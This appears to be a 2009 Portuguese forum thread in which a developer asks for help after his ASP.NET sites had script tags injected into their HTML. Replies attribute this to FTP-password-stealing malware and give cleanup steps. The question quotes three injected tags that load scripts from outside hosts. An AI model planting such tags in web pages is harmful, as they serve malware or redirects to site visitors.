none
Ataques Constantes no site (URGENTE) RRS feed

  • Pergunta

  • Boa noite galera!
    Estou precisando da ajuda de todos que possam me auxiliar!!

    Varios sites que foram desenvolvidos por mim estao sofrendo ataques do tipo cross site scripting. Esta sendo gravado no codigo html da minha pagina scripts apos o content das paginas pois meus webforms utilizam master.page e os que nao utilizam esta sendo gravado no HEAD. Segue abaixo alguns dos scripts gravados:

    <script src=http://hermosapointehomes.com/Scripts/aboutus_0clip_image002.php ></script>
    <script type="text/javascript" src="http://www.carnasite.com.br/images/home/chama.js?2"></script>
    <script src=http://co.fayette.tx.us/images/commissioners.php ></script>

    "Não imagino como esse codigo pode esta sendo gravado no codigo HTML das paginas aspx. Ja verifiquei o status do validaterequest das paginas e todas estao desabilitadas.

    Por favor peço dicas e sugestões de como agir pois estou tendo problemas com isso constantemente assim causando um desgaste com os clientes.


    thwo
    quinta-feira, 15 de outubro de 2009 02:03

Todas as Respostas

  • Olá,

    Já deu uma lida nesse artigo? http://msdn.microsoft.com/en-us/library/ms998274.aspx

    Abraço,
    Roberto Santos http://blog.robertoosantos.com
    quinta-feira, 15 de outubro de 2009 11:14
  • Olá Thiago,

    Não creio que seja um ataque css. Isso que você informou é tipico de vírus que rouba senha de FTP, faz acesso ao ftp e grava o código em suas páginas.

    Geralmente esses malwares gravam scripts que redirecionam seu site para outras páginas ou simplesmente propagam virus em clientes que acessam o site. Como você mesmo falou, vários sites que você desenvolveu foram atacados, é bem provavel que estes sites tem dados de FTP configurado em seu cliente ftp.

    Para tentar resolver o problema:
    1. Mude as senhas de seus FTPs. (de preferencia de outro computador)
    2. Passe um bom Antivirus em sua maquina ou onde tem programa de ftp configurado com os sites de seus clientes. (Se passar e não pegar nada, passe outro antivirus, passe vários)
    3. certifique-se que não há outras maquinas com clientes ftp configurado
    4. Se for possível ficar um tempo (alguns dias) sem configurar um cliente ftp em seu computador melhor..

    Após feito isso, tendo certeza que nenhum computador tem dados de ftp de seus clientes, ou que computadores que tenham dados estão bem protegidos, entre em contato com seu provedor de hospedagem, veja se não há possibilidades de o servidor estar infectado.

    Espero ter ajudado!

    []'s
    Alexandre Previatti
    . Planet
    . http://www.planetinternet.com.br
    segunda-feira, 19 de outubro de 2009 21:17